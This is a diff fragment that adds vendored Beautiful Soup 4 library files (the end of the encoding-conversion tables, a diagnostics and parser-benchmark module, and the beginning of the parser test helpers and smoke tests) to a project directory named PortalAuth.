b'\x94': ('rdquo', '201D'),
|
||||
b'\x95': ('bull', '2022'),
|
||||
b'\x96': ('ndash', '2013'),
|
||||
b'\x97': ('mdash', '2014'),
|
||||
b'\x98': ('tilde', '2DC'),
|
||||
b'\x99': ('trade', '2122'),
|
||||
b'\x9a': ('scaron', '161'),
|
||||
b'\x9b': ('rsaquo', '203A'),
|
||||
b'\x9c': ('oelig', '153'),
|
||||
b'\x9d': '?',
|
||||
b'\x9e': ('#x17E', '17E'),
|
||||
b'\x9f': ('Yuml', ''),}
|
||||
|
||||
# A parochial partial mapping of ISO-Latin-1 to ASCII. Contains
|
||||
# horrors like stripping diacritical marks to turn á into a, but also
|
||||
# contains non-horrors like turning “ into ".
|
||||
MS_CHARS_TO_ASCII = {
|
||||
b'\x80' : 'EUR',
|
||||
b'\x81' : ' ',
|
||||
b'\x82' : ',',
|
||||
b'\x83' : 'f',
|
||||
b'\x84' : ',,',
|
||||
b'\x85' : '...',
|
||||
b'\x86' : '+',
|
||||
b'\x87' : '++',
|
||||
b'\x88' : '^',
|
||||
b'\x89' : '%',
|
||||
b'\x8a' : 'S',
|
||||
b'\x8b' : '<',
|
||||
b'\x8c' : 'OE',
|
||||
b'\x8d' : '?',
|
||||
b'\x8e' : 'Z',
|
||||
b'\x8f' : '?',
|
||||
b'\x90' : '?',
|
||||
b'\x91' : "'",
|
||||
b'\x92' : "'",
|
||||
b'\x93' : '"',
|
||||
b'\x94' : '"',
|
||||
b'\x95' : '*',
|
||||
b'\x96' : '-',
|
||||
b'\x97' : '--',
|
||||
b'\x98' : '~',
|
||||
b'\x99' : '(TM)',
|
||||
b'\x9a' : 's',
|
||||
b'\x9b' : '>',
|
||||
b'\x9c' : 'oe',
|
||||
b'\x9d' : '?',
|
||||
b'\x9e' : 'z',
|
||||
b'\x9f' : 'Y',
|
||||
b'\xa0' : ' ',
|
||||
b'\xa1' : '!',
|
||||
b'\xa2' : 'c',
|
||||
b'\xa3' : 'GBP',
|
||||
b'\xa4' : '$', #This approximation is especially parochial--this is the
|
||||
#generic currency symbol.
|
||||
b'\xa5' : 'YEN',
|
||||
b'\xa6' : '|',
|
||||
b'\xa7' : 'S',
|
||||
b'\xa8' : '..',
|
||||
b'\xa9' : '',
|
||||
b'\xaa' : '(th)',
|
||||
b'\xab' : '<<',
|
||||
b'\xac' : '!',
|
||||
b'\xad' : ' ',
|
||||
b'\xae' : '(R)',
|
||||
b'\xaf' : '-',
|
||||
b'\xb0' : 'o',
|
||||
b'\xb1' : '+-',
|
||||
b'\xb2' : '2',
|
||||
b'\xb3' : '3',
|
||||
b'\xb4' : ("'", 'acute'),
|
||||
b'\xb5' : 'u',
|
||||
b'\xb6' : 'P',
|
||||
b'\xb7' : '*',
|
||||
b'\xb8' : ',',
|
||||
b'\xb9' : '1',
|
||||
b'\xba' : '(th)',
|
||||
b'\xbb' : '>>',
|
||||
b'\xbc' : '1/4',
|
||||
b'\xbd' : '1/2',
|
||||
b'\xbe' : '3/4',
|
||||
b'\xbf' : '?',
|
||||
b'\xc0' : 'A',
|
||||
b'\xc1' : 'A',
|
||||
b'\xc2' : 'A',
|
||||
b'\xc3' : 'A',
|
||||
b'\xc4' : 'A',
|
||||
b'\xc5' : 'A',
|
||||
b'\xc6' : 'AE',
|
||||
b'\xc7' : 'C',
|
||||
b'\xc8' : 'E',
|
||||
b'\xc9' : 'E',
|
||||
b'\xca' : 'E',
|
||||
b'\xcb' : 'E',
|
||||
b'\xcc' : 'I',
|
||||
b'\xcd' : 'I',
|
||||
b'\xce' : 'I',
|
||||
b'\xcf' : 'I',
|
||||
b'\xd0' : 'D',
|
||||
b'\xd1' : 'N',
|
||||
b'\xd2' : 'O',
|
||||
b'\xd3' : 'O',
|
||||
b'\xd4' : 'O',
|
||||
b'\xd5' : 'O',
|
||||
b'\xd6' : 'O',
|
||||
b'\xd7' : '*',
|
||||
b'\xd8' : 'O',
|
||||
b'\xd9' : 'U',
|
||||
b'\xda' : 'U',
|
||||
b'\xdb' : 'U',
|
||||
b'\xdc' : 'U',
|
||||
b'\xdd' : 'Y',
|
||||
b'\xde' : 'b',
|
||||
b'\xdf' : 'B',
|
||||
b'\xe0' : 'a',
|
||||
b'\xe1' : 'a',
|
||||
b'\xe2' : 'a',
|
||||
b'\xe3' : 'a',
|
||||
b'\xe4' : 'a',
|
||||
b'\xe5' : 'a',
|
||||
b'\xe6' : 'ae',
|
||||
b'\xe7' : 'c',
|
||||
b'\xe8' : 'e',
|
||||
b'\xe9' : 'e',
|
||||
b'\xea' : 'e',
|
||||
b'\xeb' : 'e',
|
||||
b'\xec' : 'i',
|
||||
b'\xed' : 'i',
|
||||
b'\xee' : 'i',
|
||||
b'\xef' : 'i',
|
||||
b'\xf0' : 'o',
|
||||
b'\xf1' : 'n',
|
||||
b'\xf2' : 'o',
|
||||
b'\xf3' : 'o',
|
||||
b'\xf4' : 'o',
|
||||
b'\xf5' : 'o',
|
||||
b'\xf6' : 'o',
|
||||
b'\xf7' : '/',
|
||||
b'\xf8' : 'o',
|
||||
b'\xf9' : 'u',
|
||||
b'\xfa' : 'u',
|
||||
b'\xfb' : 'u',
|
||||
b'\xfc' : 'u',
|
||||
b'\xfd' : 'y',
|
||||
b'\xfe' : 'b',
|
||||
b'\xff' : 'y',
|
||||
}
|
||||
|
||||
# A map used when removing rogue Windows-1252/ISO-8859-1
|
||||
# characters in otherwise UTF-8 documents.
|
||||
#
|
||||
# Note that \x81, \x8d, \x8f, \x90, and \x9d are undefined in
|
||||
# Windows-1252.
|
||||
WINDOWS_1252_TO_UTF8 = {
|
||||
0x80 : b'\xe2\x82\xac', # €
|
||||
0x82 : b'\xe2\x80\x9a', # ‚
|
||||
0x83 : b'\xc6\x92', # ƒ
|
||||
0x84 : b'\xe2\x80\x9e', # „
|
||||
0x85 : b'\xe2\x80\xa6', # …
|
||||
0x86 : b'\xe2\x80\xa0', # †
|
||||
0x87 : b'\xe2\x80\xa1', # ‡
|
||||
0x88 : b'\xcb\x86', # ˆ
|
||||
0x89 : b'\xe2\x80\xb0', # ‰
|
||||
0x8a : b'\xc5\xa0', # Š
|
||||
0x8b : b'\xe2\x80\xb9', # ‹
|
||||
0x8c : b'\xc5\x92', # Œ
|
||||
0x8e : b'\xc5\xbd', # Ž
|
||||
0x91 : b'\xe2\x80\x98', # ‘
|
||||
0x92 : b'\xe2\x80\x99', # ’
|
||||
0x93 : b'\xe2\x80\x9c', # “
|
||||
0x94 : b'\xe2\x80\x9d', # ”
|
||||
0x95 : b'\xe2\x80\xa2', # •
|
||||
0x96 : b'\xe2\x80\x93', # –
|
||||
0x97 : b'\xe2\x80\x94', # —
|
||||
0x98 : b'\xcb\x9c', # ˜
|
||||
0x99 : b'\xe2\x84\xa2', # ™
|
||||
0x9a : b'\xc5\xa1', # š
|
||||
0x9b : b'\xe2\x80\xba', # ›
|
||||
0x9c : b'\xc5\x93', # œ
|
||||
0x9e : b'\xc5\xbe', # ž
|
||||
0x9f : b'\xc5\xb8', # Ÿ
|
||||
0xa0 : b'\xc2\xa0', #
|
||||
0xa1 : b'\xc2\xa1', # ¡
|
||||
0xa2 : b'\xc2\xa2', # ¢
|
||||
0xa3 : b'\xc2\xa3', # £
|
||||
0xa4 : b'\xc2\xa4', # ¤
|
||||
0xa5 : b'\xc2\xa5', # ¥
|
||||
0xa6 : b'\xc2\xa6', # ¦
|
||||
0xa7 : b'\xc2\xa7', # §
|
||||
0xa8 : b'\xc2\xa8', # ¨
|
||||
0xa9 : b'\xc2\xa9', # ©
|
||||
0xaa : b'\xc2\xaa', # ª
|
||||
0xab : b'\xc2\xab', # «
|
||||
0xac : b'\xc2\xac', # ¬
|
||||
0xad : b'\xc2\xad', #
|
||||
0xae : b'\xc2\xae', # ®
|
||||
0xaf : b'\xc2\xaf', # ¯
|
||||
0xb0 : b'\xc2\xb0', # °
|
||||
0xb1 : b'\xc2\xb1', # ±
|
||||
0xb2 : b'\xc2\xb2', # ²
|
||||
0xb3 : b'\xc2\xb3', # ³
|
||||
0xb4 : b'\xc2\xb4', # ´
|
||||
0xb5 : b'\xc2\xb5', # µ
|
||||
0xb6 : b'\xc2\xb6', # ¶
|
||||
0xb7 : b'\xc2\xb7', # ·
|
||||
0xb8 : b'\xc2\xb8', # ¸
|
||||
0xb9 : b'\xc2\xb9', # ¹
|
||||
0xba : b'\xc2\xba', # º
|
||||
0xbb : b'\xc2\xbb', # »
|
||||
0xbc : b'\xc2\xbc', # ¼
|
||||
0xbd : b'\xc2\xbd', # ½
|
||||
0xbe : b'\xc2\xbe', # ¾
|
||||
0xbf : b'\xc2\xbf', # ¿
|
||||
0xc0 : b'\xc3\x80', # À
|
||||
0xc1 : b'\xc3\x81', # Á
|
||||
0xc2 : b'\xc3\x82', # Â
|
||||
0xc3 : b'\xc3\x83', # Ã
|
||||
0xc4 : b'\xc3\x84', # Ä
|
||||
0xc5 : b'\xc3\x85', # Å
|
||||
0xc6 : b'\xc3\x86', # Æ
|
||||
0xc7 : b'\xc3\x87', # Ç
|
||||
0xc8 : b'\xc3\x88', # È
|
||||
0xc9 : b'\xc3\x89', # É
|
||||
0xca : b'\xc3\x8a', # Ê
|
||||
0xcb : b'\xc3\x8b', # Ë
|
||||
0xcc : b'\xc3\x8c', # Ì
|
||||
0xcd : b'\xc3\x8d', # Í
|
||||
0xce : b'\xc3\x8e', # Î
|
||||
0xcf : b'\xc3\x8f', # Ï
|
||||
0xd0 : b'\xc3\x90', # Ð
|
||||
0xd1 : b'\xc3\x91', # Ñ
|
||||
0xd2 : b'\xc3\x92', # Ò
|
||||
0xd3 : b'\xc3\x93', # Ó
|
||||
0xd4 : b'\xc3\x94', # Ô
|
||||
0xd5 : b'\xc3\x95', # Õ
|
||||
0xd6 : b'\xc3\x96', # Ö
|
||||
0xd7 : b'\xc3\x97', # ×
|
||||
0xd8 : b'\xc3\x98', # Ø
|
||||
0xd9 : b'\xc3\x99', # Ù
|
||||
0xda : b'\xc3\x9a', # Ú
|
||||
0xdb : b'\xc3\x9b', # Û
|
||||
0xdc : b'\xc3\x9c', # Ü
|
||||
0xdd : b'\xc3\x9d', # Ý
|
||||
0xde : b'\xc3\x9e', # Þ
|
||||
0xdf : b'\xc3\x9f', # ß
|
||||
0xe0 : b'\xc3\xa0', # à
|
||||
0xe1 : b'\xa1', # á
|
||||
0xe2 : b'\xc3\xa2', # â
|
||||
0xe3 : b'\xc3\xa3', # ã
|
||||
0xe4 : b'\xc3\xa4', # ä
|
||||
0xe5 : b'\xc3\xa5', # å
|
||||
0xe6 : b'\xc3\xa6', # æ
|
||||
0xe7 : b'\xc3\xa7', # ç
|
||||
0xe8 : b'\xc3\xa8', # è
|
||||
0xe9 : b'\xc3\xa9', # é
|
||||
0xea : b'\xc3\xaa', # ê
|
||||
0xeb : b'\xc3\xab', # ë
|
||||
0xec : b'\xc3\xac', # ì
|
||||
0xed : b'\xc3\xad', # í
|
||||
0xee : b'\xc3\xae', # î
|
||||
0xef : b'\xc3\xaf', # ï
|
||||
0xf0 : b'\xc3\xb0', # ð
|
||||
0xf1 : b'\xc3\xb1', # ñ
|
||||
0xf2 : b'\xc3\xb2', # ò
|
||||
0xf3 : b'\xc3\xb3', # ó
|
||||
0xf4 : b'\xc3\xb4', # ô
|
||||
0xf5 : b'\xc3\xb5', # õ
|
||||
0xf6 : b'\xc3\xb6', # ö
|
||||
0xf7 : b'\xc3\xb7', # ÷
|
||||
0xf8 : b'\xc3\xb8', # ø
|
||||
0xf9 : b'\xc3\xb9', # ù
|
||||
0xfa : b'\xc3\xba', # ú
|
||||
0xfb : b'\xc3\xbb', # û
|
||||
0xfc : b'\xc3\xbc', # ü
|
||||
0xfd : b'\xc3\xbd', # ý
|
||||
0xfe : b'\xc3\xbe', # þ
|
||||
}
|
||||
|
||||
MULTIBYTE_MARKERS_AND_SIZES = [
|
||||
(0xc2, 0xdf, 2), # 2-byte characters start with a byte C2-DF
|
||||
(0xe0, 0xef, 3), # 3-byte characters start with E0-EF
|
||||
(0xf0, 0xf4, 4), # 4-byte characters start with F0-F4
|
||||
]
|
||||
|
||||
FIRST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[0][0]
|
||||
LAST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[-1][1]
|
||||
|
||||
@classmethod
|
||||
def detwingle(cls, in_bytes, main_encoding="utf8",
|
||||
embedded_encoding="windows-1252"):
|
||||
"""Fix characters from one encoding embedded in some other encoding.
|
||||
|
||||
Currently the only situation supported is Windows-1252 (or its
|
||||
subset ISO-8859-1), embedded in UTF-8.
|
||||
|
||||
The input must be a bytestring. If you've already converted
|
||||
the document to Unicode, you're too late.
|
||||
|
||||
The output is a bytestring in which `embedded_encoding`
|
||||
characters have been converted to their `main_encoding`
|
||||
equivalents.
|
||||
"""
|
||||
if embedded_encoding.replace('_', '-').lower() not in (
|
||||
'windows-1252', 'windows_1252'):
|
||||
raise NotImplementedError(
|
||||
"Windows-1252 and ISO-8859-1 are the only currently supported "
|
||||
"embedded encodings.")
|
||||
|
||||
if main_encoding.lower() not in ('utf8', 'utf-8'):
|
||||
raise NotImplementedError(
|
||||
"UTF-8 is the only currently supported main encoding.")
|
||||
|
||||
byte_chunks = []
|
||||
|
||||
chunk_start = 0
|
||||
pos = 0
|
||||
while pos < len(in_bytes):
|
||||
byte = in_bytes[pos]
|
||||
if not isinstance(byte, int):
|
||||
# Python 2.x
|
||||
byte = ord(byte)
|
||||
if (byte >= cls.FIRST_MULTIBYTE_MARKER
|
||||
and byte <= cls.LAST_MULTIBYTE_MARKER):
|
||||
# This is the start of a UTF-8 multibyte character. Skip
|
||||
# to the end.
|
||||
for start, end, size in cls.MULTIBYTE_MARKERS_AND_SIZES:
|
||||
if byte >= start and byte <= end:
|
||||
pos += size
|
||||
break
|
||||
elif byte >= 0x80 and byte in cls.WINDOWS_1252_TO_UTF8:
|
||||
# We found a Windows-1252 character!
|
||||
# Save the string up to this point as a chunk.
|
||||
byte_chunks.append(in_bytes[chunk_start:pos])
|
||||
|
||||
# Now translate the Windows-1252 character into UTF-8
|
||||
# and add it as another, one-byte chunk.
|
||||
byte_chunks.append(cls.WINDOWS_1252_TO_UTF8[byte])
|
||||
pos += 1
|
||||
chunk_start = pos
|
||||
else:
|
||||
# Go on to the next character.
|
||||
pos += 1
|
||||
if chunk_start == 0:
|
||||
# The string is unchanged.
|
||||
return in_bytes
|
||||
else:
|
||||
# Store the final chunk.
|
||||
byte_chunks.append(in_bytes[chunk_start:])
|
||||
return b''.join(byte_chunks)
|
||||
|
||||
213
PortalAuth/includes/scripts/libs/bs4/diagnose.py
Executable file
213
PortalAuth/includes/scripts/libs/bs4/diagnose.py
Executable file
@@ -0,0 +1,213 @@
|
||||
"""Diagnostic functions, mainly for use when doing tech support."""
|
||||
import cProfile
|
||||
from StringIO import StringIO
|
||||
from HTMLParser import HTMLParser
|
||||
import bs4
|
||||
from bs4 import BeautifulSoup, __version__
|
||||
from bs4.builder import builder_registry
|
||||
|
||||
import os
|
||||
import pstats
|
||||
import random
|
||||
import tempfile
|
||||
import time
|
||||
import traceback
|
||||
import sys
|
||||
import cProfile
|
||||
|
||||
def diagnose(data):
|
||||
"""Diagnostic suite for isolating common problems."""
|
||||
print "Diagnostic running on Beautiful Soup %s" % __version__
|
||||
print "Python version %s" % sys.version
|
||||
|
||||
basic_parsers = ["html.parser", "html5lib", "lxml"]
|
||||
for name in basic_parsers:
|
||||
for builder in builder_registry.builders:
|
||||
if name in builder.features:
|
||||
break
|
||||
else:
|
||||
basic_parsers.remove(name)
|
||||
print (
|
||||
"I noticed that %s is not installed. Installing it may help." %
|
||||
name)
|
||||
|
||||
if 'lxml' in basic_parsers:
|
||||
basic_parsers.append(["lxml", "xml"])
|
||||
try:
|
||||
from lxml import etree
|
||||
print "Found lxml version %s" % ".".join(map(str,etree.LXML_VERSION))
|
||||
except ImportError, e:
|
||||
print (
|
||||
"lxml is not installed or couldn't be imported.")
|
||||
|
||||
|
||||
if 'html5lib' in basic_parsers:
|
||||
try:
|
||||
import html5lib
|
||||
print "Found html5lib version %s" % html5lib.__version__
|
||||
except ImportError, e:
|
||||
print (
|
||||
"html5lib is not installed or couldn't be imported.")
|
||||
|
||||
if hasattr(data, 'read'):
|
||||
data = data.read()
|
||||
elif os.path.exists(data):
|
||||
print '"%s" looks like a filename. Reading data from the file.' % data
|
||||
data = open(data).read()
|
||||
elif data.startswith("http:") or data.startswith("https:"):
|
||||
print '"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data
|
||||
print "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
|
||||
return
|
||||
print
|
||||
|
||||
for parser in basic_parsers:
|
||||
print "Trying to parse your markup with %s" % parser
|
||||
success = False
|
||||
try:
|
||||
soup = BeautifulSoup(data, parser)
|
||||
success = True
|
||||
except Exception, e:
|
||||
print "%s could not parse the markup." % parser
|
||||
traceback.print_exc()
|
||||
if success:
|
||||
print "Here's what %s did with the markup:" % parser
|
||||
print soup.prettify()
|
||||
|
||||
print "-" * 80
|
||||
|
||||
def lxml_trace(data, html=True, **kwargs):
|
||||
"""Print out the lxml events that occur during parsing.
|
||||
|
||||
This lets you see how lxml parses a document when no Beautiful
|
||||
Soup code is running.
|
||||
"""
|
||||
from lxml import etree
|
||||
for event, element in etree.iterparse(StringIO(data), html=html, **kwargs):
|
||||
print("%s, %4s, %s" % (event, element.tag, element.text))
|
||||
|
||||
class AnnouncingParser(HTMLParser):
|
||||
"""Announces HTMLParser parse events, without doing anything else."""
|
||||
|
||||
def _p(self, s):
|
||||
print(s)
|
||||
|
||||
def handle_starttag(self, name, attrs):
|
||||
self._p("%s START" % name)
|
||||
|
||||
def handle_endtag(self, name):
|
||||
self._p("%s END" % name)
|
||||
|
||||
def handle_data(self, data):
|
||||
self._p("%s DATA" % data)
|
||||
|
||||
def handle_charref(self, name):
|
||||
self._p("%s CHARREF" % name)
|
||||
|
||||
def handle_entityref(self, name):
|
||||
self._p("%s ENTITYREF" % name)
|
||||
|
||||
def handle_comment(self, data):
|
||||
self._p("%s COMMENT" % data)
|
||||
|
||||
def handle_decl(self, data):
|
||||
self._p("%s DECL" % data)
|
||||
|
||||
def unknown_decl(self, data):
|
||||
self._p("%s UNKNOWN-DECL" % data)
|
||||
|
||||
def handle_pi(self, data):
|
||||
self._p("%s PI" % data)
|
||||
|
||||
def htmlparser_trace(data):
|
||||
"""Print out the HTMLParser events that occur during parsing.
|
||||
|
||||
This lets you see how HTMLParser parses a document when no
|
||||
Beautiful Soup code is running.
|
||||
"""
|
||||
parser = AnnouncingParser()
|
||||
parser.feed(data)
|
||||
|
||||
_vowels = "aeiou"
|
||||
_consonants = "bcdfghjklmnpqrstvwxyz"
|
||||
|
||||
def rword(length=5):
|
||||
"Generate a random word-like string."
|
||||
s = ''
|
||||
for i in range(length):
|
||||
if i % 2 == 0:
|
||||
t = _consonants
|
||||
else:
|
||||
t = _vowels
|
||||
s += random.choice(t)
|
||||
return s
|
||||
|
||||
def rsentence(length=4):
|
||||
"Generate a random sentence-like string."
|
||||
return " ".join(rword(random.randint(4,9)) for i in range(length))
|
||||
|
||||
def rdoc(num_elements=1000):
|
||||
"""Randomly generate an invalid HTML document."""
|
||||
tag_names = ['p', 'div', 'span', 'i', 'b', 'script', 'table']
|
||||
elements = []
|
||||
for i in range(num_elements):
|
||||
choice = random.randint(0,3)
|
||||
if choice == 0:
|
||||
# New tag.
|
||||
tag_name = random.choice(tag_names)
|
||||
elements.append("<%s>" % tag_name)
|
||||
elif choice == 1:
|
||||
elements.append(rsentence(random.randint(1,4)))
|
||||
elif choice == 2:
|
||||
# Close a tag.
|
||||
tag_name = random.choice(tag_names)
|
||||
elements.append("</%s>" % tag_name)
|
||||
return "<html>" + "\n".join(elements) + "</html>"
|
||||
|
||||
def benchmark_parsers(num_elements=100000):
|
||||
"""Very basic head-to-head performance benchmark."""
|
||||
print "Comparative parser benchmark on Beautiful Soup %s" % __version__
|
||||
data = rdoc(num_elements)
|
||||
print "Generated a large invalid HTML document (%d bytes)." % len(data)
|
||||
|
||||
for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
|
||||
success = False
|
||||
try:
|
||||
a = time.time()
|
||||
soup = BeautifulSoup(data, parser)
|
||||
b = time.time()
|
||||
success = True
|
||||
except Exception, e:
|
||||
print "%s could not parse the markup." % parser
|
||||
traceback.print_exc()
|
||||
if success:
|
||||
print "BS4+%s parsed the markup in %.2fs." % (parser, b-a)
|
||||
|
||||
from lxml import etree
|
||||
a = time.time()
|
||||
etree.HTML(data)
|
||||
b = time.time()
|
||||
print "Raw lxml parsed the markup in %.2fs." % (b-a)
|
||||
|
||||
import html5lib
|
||||
parser = html5lib.HTMLParser()
|
||||
a = time.time()
|
||||
parser.parse(data)
|
||||
b = time.time()
|
||||
print "Raw html5lib parsed the markup in %.2fs." % (b-a)
|
||||
|
||||
def profile(num_elements=100000, parser="lxml"):
|
||||
|
||||
filehandle = tempfile.NamedTemporaryFile()
|
||||
filename = filehandle.name
|
||||
|
||||
data = rdoc(num_elements)
|
||||
vars = dict(bs4=bs4, data=data, parser=parser)
|
||||
cProfile.runctx('bs4.BeautifulSoup(data, parser)' , vars, vars, filename)
|
||||
|
||||
stats = pstats.Stats(filename)
|
||||
# stats.strip_dirs()
|
||||
stats.sort_stats("cumulative")
|
||||
stats.print_stats('_html5lib|bs4', 50)
|
||||
|
||||
if __name__ == '__main__':
|
||||
diagnose(sys.stdin.read())
|
||||
1713
PortalAuth/includes/scripts/libs/bs4/element.py
Executable file
1713
PortalAuth/includes/scripts/libs/bs4/element.py
Executable file
File diff suppressed because it is too large
Load Diff
680
PortalAuth/includes/scripts/libs/bs4/testing.py
Executable file
680
PortalAuth/includes/scripts/libs/bs4/testing.py
Executable file
@@ -0,0 +1,680 @@
|
||||
"""Helper classes for tests."""
|
||||
|
||||
import pickle
|
||||
import copy
|
||||
import functools
|
||||
import unittest
|
||||
from unittest import TestCase
|
||||
from bs4 import BeautifulSoup
|
||||
from bs4.element import (
|
||||
CharsetMetaAttributeValue,
|
||||
Comment,
|
||||
ContentMetaAttributeValue,
|
||||
Doctype,
|
||||
SoupStrainer,
|
||||
)
|
||||
|
||||
from bs4.builder import HTMLParserTreeBuilder
|
||||
default_builder = HTMLParserTreeBuilder
|
||||
|
||||
|
||||
class SoupTest(unittest.TestCase):
|
||||
|
||||
@property
|
||||
def default_builder(self):
|
||||
return default_builder()
|
||||
|
||||
def soup(self, markup, **kwargs):
|
||||
"""Build a Beautiful Soup object from markup."""
|
||||
builder = kwargs.pop('builder', self.default_builder)
|
||||
return BeautifulSoup(markup, builder=builder, **kwargs)
|
||||
|
||||
def document_for(self, markup):
|
||||
"""Turn an HTML fragment into a document.
|
||||
|
||||
The details depend on the builder.
|
||||
"""
|
||||
return self.default_builder.test_fragment_to_document(markup)
|
||||
|
||||
def assertSoupEquals(self, to_parse, compare_parsed_to=None):
|
||||
builder = self.default_builder
|
||||
obj = BeautifulSoup(to_parse, builder=builder)
|
||||
if compare_parsed_to is None:
|
||||
compare_parsed_to = to_parse
|
||||
|
||||
self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
|
||||
|
||||
def assertConnectedness(self, element):
|
||||
"""Ensure that next_element and previous_element are properly
|
||||
set for all descendants of the given element.
|
||||
"""
|
||||
earlier = None
|
||||
for e in element.descendants:
|
||||
if earlier:
|
||||
self.assertEqual(e, earlier.next_element)
|
||||
self.assertEqual(earlier, e.previous_element)
|
||||
earlier = e
|
||||
|
||||
class HTMLTreeBuilderSmokeTest(object):
|
||||
|
||||
"""A basic test of a treebuilder's competence.
|
||||
|
||||
Any HTML treebuilder, present or future, should be able to pass
|
||||
these tests. With invalid markup, there's room for interpretation,
|
||||
and different parsers can handle it differently. But with the
|
||||
markup in these tests, there's not much room for interpretation.
|
||||
"""
|
||||
|
||||
def test_pickle_and_unpickle_identity(self):
|
||||
# Pickling a tree, then unpickling it, yields a tree identical
|
||||
# to the original.
|
||||
tree = self.soup("<a><b>foo</a>")
|
||||
dumped = pickle.dumps(tree, 2)
|
||||
loaded = pickle.loads(dumped)
|
||||
self.assertEqual(loaded.__class__, BeautifulSoup)
|
||||
self.assertEqual(loaded.decode(), tree.decode())
|
||||
|
||||
def assertDoctypeHandled(self, doctype_fragment):
|
||||
"""Assert that a given doctype string is handled correctly."""
|
||||
doctype_str, soup = self._document_with_doctype(doctype_fragment)
|
||||
|
||||
# Make sure a Doctype object was created.
|
||||
doctype = soup.contents[0]
|
||||
self.assertEqual(doctype.__class__, Doctype)
|
||||
self.assertEqual(doctype, doctype_fragment)
|
||||
self.assertEqual(str(soup)[:len(doctype_str)], doctype_str)
|
||||
|
||||
# Make sure that the doctype was correctly associated with the
|
||||
# parse tree and that the rest of the document parsed.
|
||||
self.assertEqual(soup.p.contents[0], 'foo')
|
||||
|
||||
def _document_with_doctype(self, doctype_fragment):
|
||||
"""Generate and parse a document with the given doctype."""
|
||||
doctype = '<!DOCTYPE %s>' % doctype_fragment
|
||||
markup = doctype + '\n<p>foo</p>'
|
||||
soup = self.soup(markup)
|
||||
return doctype, soup
|
||||
|
||||
def test_normal_doctypes(self):
|
||||
"""Make sure normal, everyday HTML doctypes are handled correctly."""
|
||||
self.assertDoctypeHandled("html")
|
||||
self.assertDoctypeHandled(
|
||||
'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"')
|
||||
|
||||
def test_empty_doctype(self):
|
||||
soup = self.soup("<!DOCTYPE>")
|
||||
doctype = soup.contents[0]
|
||||
self.assertEqual("", doctype.strip())
|
||||
|
||||
def test_public_doctype_with_url(self):
|
||||
doctype = 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"'
|
||||
self.assertDoctypeHandled(doctype)
|
||||
|
||||
def test_system_doctype(self):
|
||||
self.assertDoctypeHandled('foo SYSTEM "http://www.example.com/"')
|
||||
|
||||
def test_namespaced_system_doctype(self):
|
||||
# We can handle a namespaced doctype with a system ID.
|
||||
self.assertDoctypeHandled('xsl:stylesheet SYSTEM "htmlent.dtd"')
|
||||
|
||||
def test_namespaced_public_doctype(self):
|
||||
# Test a namespaced doctype with a public id.
|
||||
self.assertDoctypeHandled('xsl:stylesheet PUBLIC "htmlent.dtd"')
|
||||
|
||||
def test_real_xhtml_document(self):
|
||||
"""A real XHTML document should come out more or less the same as it went in."""
|
||||
markup = b"""<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head><title>Hello.</title></head>
|
||||
<body>Goodbye.</body>
|
||||
</html>"""
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(
|
||||
soup.encode("utf-8").replace(b"\n", b""),
|
||||
markup.replace(b"\n", b""))
|
||||
|
||||
def test_processing_instruction(self):
|
||||
markup = b"""<?PITarget PIContent?>"""
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(markup, soup.encode("utf8"))
|
||||
|
||||
def test_deepcopy(self):
|
||||
"""Make sure you can copy the tree builder.
|
||||
|
||||
This is important because the builder is part of a
|
||||
BeautifulSoup object, and we want to be able to copy that.
|
||||
"""
|
||||
copy.deepcopy(self.default_builder)
|
||||
|
||||
def test_p_tag_is_never_empty_element(self):
|
||||
"""A <p> tag is never designated as an empty-element tag.
|
||||
|
||||
Even if the markup shows it as an empty-element tag, it
|
||||
shouldn't be presented that way.
|
||||
"""
|
||||
soup = self.soup("<p/>")
|
||||
self.assertFalse(soup.p.is_empty_element)
|
||||
self.assertEqual(str(soup.p), "<p></p>")
|
||||
|
||||
def test_unclosed_tags_get_closed(self):
|
||||
"""A tag that's not closed by the end of the document should be closed.
|
||||
|
||||
This applies to all tags except empty-element tags.
|
||||
"""
|
||||
self.assertSoupEquals("<p>", "<p></p>")
|
||||
self.assertSoupEquals("<b>", "<b></b>")
|
||||
|
||||
self.assertSoupEquals("<br>", "<br/>")
|
||||
|
||||
def test_br_is_always_empty_element_tag(self):
|
||||
"""A <br> tag is designated as an empty-element tag.
|
||||
|
||||
Some parsers treat <br></br> as one <br/> tag, some parsers as
|
||||
two tags, but it should always be an empty-element tag.
|
||||
"""
|
||||
soup = self.soup("<br></br>")
|
||||
self.assertTrue(soup.br.is_empty_element)
|
||||
self.assertEqual(str(soup.br), "<br/>")
|
||||
|
||||
def test_nested_formatting_elements(self):
|
||||
self.assertSoupEquals("<em><em></em></em>")
|
||||
|
||||
def test_double_head(self):
|
||||
html = '''<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Ordinary HEAD element test</title>
|
||||
</head>
|
||||
<script type="text/javascript">
|
||||
alert("Help!");
|
||||
</script>
|
||||
<body>
|
||||
Hello, world!
|
||||
</body>
|
||||
</html>
|
||||
'''
|
||||
soup = self.soup(html)
|
||||
self.assertEqual("text/javascript", soup.find('script')['type'])
|
||||
|
||||
def test_comment(self):
|
||||
# Comments are represented as Comment objects.
|
||||
markup = "<p>foo<!--foobar-->baz</p>"
|
||||
self.assertSoupEquals(markup)
|
||||
|
||||
soup = self.soup(markup)
|
||||
comment = soup.find(text="foobar")
|
||||
self.assertEqual(comment.__class__, Comment)
|
||||
|
||||
# The comment is properly integrated into the tree.
|
||||
foo = soup.find(text="foo")
|
||||
self.assertEqual(comment, foo.next_element)
|
||||
baz = soup.find(text="baz")
|
||||
self.assertEqual(comment, baz.previous_element)
|
||||
|
||||
def test_preserved_whitespace_in_pre_and_textarea(self):
|
||||
